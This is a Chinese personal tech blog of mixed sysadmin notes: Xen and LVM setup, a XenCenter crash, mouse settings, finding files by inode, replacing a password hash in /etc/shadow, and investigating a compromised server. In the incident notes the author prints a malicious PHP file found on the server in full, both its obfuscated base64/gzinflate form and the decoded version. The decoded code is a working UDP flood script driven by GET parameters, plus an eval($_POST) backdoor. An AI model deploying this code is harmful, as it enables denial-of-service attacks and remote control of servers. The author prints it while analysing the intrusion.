潘文斌个人博客

xen更新kernel和kernel-xen后，没有自动设定为kernel-xen的img

修改grub.conf解决
(其实kernel那个包都不用更新了，反正不用)

http://www.ibm.com/developerworks/cn/linux/l-bash-parameters.html

http://www.cnblogs.com/FrankTan/archive/2010/03/01/1634516.html

母鸡系统centos5.5 64bit
磁盘采用LVM no raid，初始是raid 0

下面开始:
1,安装xen

yum install xen kernel-xen

编辑grub

sed -i 's/default=1/default=0/' /boot/grub/grub.conf

设置console,在kernel行后面增加 com1=38400,8n1 （我所在服务器提供商特有的，其他不需设置）

shutdown -r now

，重启服务器

2.转换raid0为LVM noraid

umount /raid0 
/bin/sed -i -e '/^\/.*\/raid0/d' /etc/fstab 
/sbin/mdadm --manage /dev/md2 --stop 
/sbin/mdadm --zero-superblock /dev/sda3 /dev/sdb3 
sed -i -e '/^ARRAY/d' /etc/mdadm.conf 
/sbin/mdadm --examine --scan >> /etc/mdadm.conf 
pvcreate /dev/sda3 /dev/sdb3 
vgcreate XenVolG /dev/sda3 /dev/sdb3

从事件查看器里面看到错误日志

事件 ID ( 1000 )的描述(在资源( .NET Runtime 2.0 Error Reporting )中)无法找到。本地计算机可能没有必要的注册信息或消息 DLL 文件来从远程计算机显示消息。您可能可以使用 /AUXSOURCE= 标识来检索词描述；查看帮助和支持以了解详细信息。下列信息是事件的一部分: xencentermain.exe, 11020.0.0.0, 4bf51aeb, kernel32.dll, 5.2.3790.4480, 49c51ee2, 0, 0000bef7.

Faulting application xencentermain.exe, version 11020.0.0.0, stamp 4bf51aeb, faulting module kernel32.dll, version 5.2.3790.4480, stamp 49c51ee2, debug? 0, fault address 0x0000bef7.

现在先更新了.NET Runtime 2.0 SP1到.NET Runtime 2.0 SP2，装完看有没有用，居然可以打开了

新的罗技（Logitech）RX250 光电黑貂鼠标 定位非常不爽，于是又了下面的内容
搜索该鼠标的坏评论，评价很差。
体会使用感受，明显的是”移动速度小，屏幕鼠标移动非常慢，移动速度快，屏幕鼠标移动很快”
搜到了一个提高指针精确度的选项，把选项去掉，屏幕鼠标移动就接近等比例的鼠标移动举例，勾上，就明显感觉到，”移动速度小，屏幕鼠标移动非常慢，移动速度快，屏幕鼠标移动很快”。

有人解释，这个选项可以使移动平滑，测试下来确实如此，不勾选的情况下，移动会伴随抖动。
有人解释，这个是给垃圾鼠标用的，好鼠标不能勾。也有道理
有人解释是这个选项是加速度。经测试，确实明显的加速度。并且附带文章

http://www.microsoft.com/whdc/archive/pointer-bal.mspx

http://blog.csdn.net/becdecorbin/archive/2010/05/26/5624481.aspx

看完文章，稍微总结一下。
这个选项会有平滑作用，另外有加速度，更适合人体的使用。
但是也因个人使用习惯而异，游戏用户拿着好鼠标，或许不需要windows来改变鼠标的精准度(位移量不对应了)。

最后，希望有个好鼠标来试试不开 “提高指针精确度” 的使用感受是如何的。
想要有个好鼠标。。。手里的鼠标在关掉这个选项后，抖动严重，明显质量不行

ls -i

121211 filename.txt
可以看到inode number

find . -inum 121211

可以找到文件名

find . -inum 121211 -exec rm -i {} \;

find . -inum 121211 -exec mv {} newfilename \;

或者

rm -i `find . -inum 121211`

/etc/shadow中格式如下
#testaccount:$1$acQMceF9$1SaCpG2qiKKA3eGolU4Fp0:13402:0:99999:7:::
彩色段为加密后的密码，$1$表示采用的是md5加密，绿色段是简单的字符串，蓝色段为加密后的密码

以下命令可得到加密后的字符串，zz为密码
perl -e ‘print crypt(“zz“,”\$1\$acQMceF9\$”),”\n”‘

结果如下
$1$acQMceF9$1SaCpG2qiKKA3eGolU4Fp0

用此段密码替换/etc/shadow中的密码部分即可

来源: http://linux.chinaunix.net/bbs/viewthread.php?tid=940012

原因是一个用户的ftp被弱口令爆破了，上传了具有攻击功能的马。
造成问题的元凶 help.php

eval(gzinflate(base64_decode('DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLbVkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGYibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci13dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCwxiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOuSJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Awe8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnubV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3chsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));

几次解密后:

<?php
 
 
$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
 
$exec_time = $_GET['time'];
 
$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;
 
for($i=0;$i<65535;$i++){
        $out .= "X";
}
while(1){
$packets++;
        if(time() > $max_time){
                break;
        }
 
        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
        if($fp){
                fwrite($fp, $out);
                fclose($fp);
        }
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>
<?php eval($_POST[ddos])?>

这个文件用fsockopen函数发起udp攻击
之前在hostloc论坛已经看到过有人中过了，不然我还不一定能发现。

查了一下，夜盲症是缺维生素A

http://baike.baidu.com/view/6447.htm

相伴的症状还有
表现
　　1、暗适应能力下降、夜盲，结膜干燥及干眼病，出现毕脱氏斑 角膜软化穿孔而致失明；
　　2、粘膜、上皮改变 ；
　　3、生长发育受阻 易患呼吸道感染；
　　4、味觉、嗅觉减弱，食欲下降；
　　5、头发枯干、皮肤粗糙、毛囊角化，记忆力减退、心情烦躁及失眠。

维生素A大量存在于动物肝脏(猪肝是我唯一吃不下的东西，很少吃)，胡萝卜带有另一种Va,不能直接使用。

额，我得吃点动物肝脏和胡萝卜

这几天发现服务器流量图一直有突然的很大out-bound流量，很是不解。
攻击的话，应该是in-bound也要比较大吧。

从XenCenter看网络流量，看不出哪个占用高了，因为5秒刷新一下，而且流量数据也不是很准。

那就用之前写的网卡当前速度统计脚本吧，修改脚本，设定一个警戒流量，当超过时，把当时情况记录下来。记录下时间和瞬间流量，然后记录下进程列表。试了一下，进程列表看不出异常，想到ip_conntrack，找了好一会儿才想起来这个名，改成记录当时的ip_conntrack，过了一会儿出现记录文件了，有5M多，打开一看1万次的DNS请求，我的妈呀。

由于服务器设定了机房的DNS，所以这1万次DNS请求的流量也会在服务器流量图上。根据机房建议，改/etc/resolv.conf文件，设置dns为本机。

过一会儿，依然有大量本机查询的记录，然后比较平静，因为太晚了。
检查过程中，从/var/log/messages看named的日志时，看到有不大量ftp的失败请求，看上去像暴力猜解，网络真不安全，先装好ssh的denyhosts，发现用来设置ftp的软件没ssh的多，fail2ban是一个，他是通过iptables来屏蔽的，但是又有点想自己写，比较好掌握些。

这个再看吧，先到这里，待续。。。

续：
继续观察，发现大量请求还有udp对别的机器80端口的大量数据包(变成肉鸡了？)，很是悲哀，暂时不知道如何查找占用流量的进程，这个udp dport 80用iptables DROP了。目前情绪稳定。
iptraf这个工具比较强大，但是编译出错，以后再看。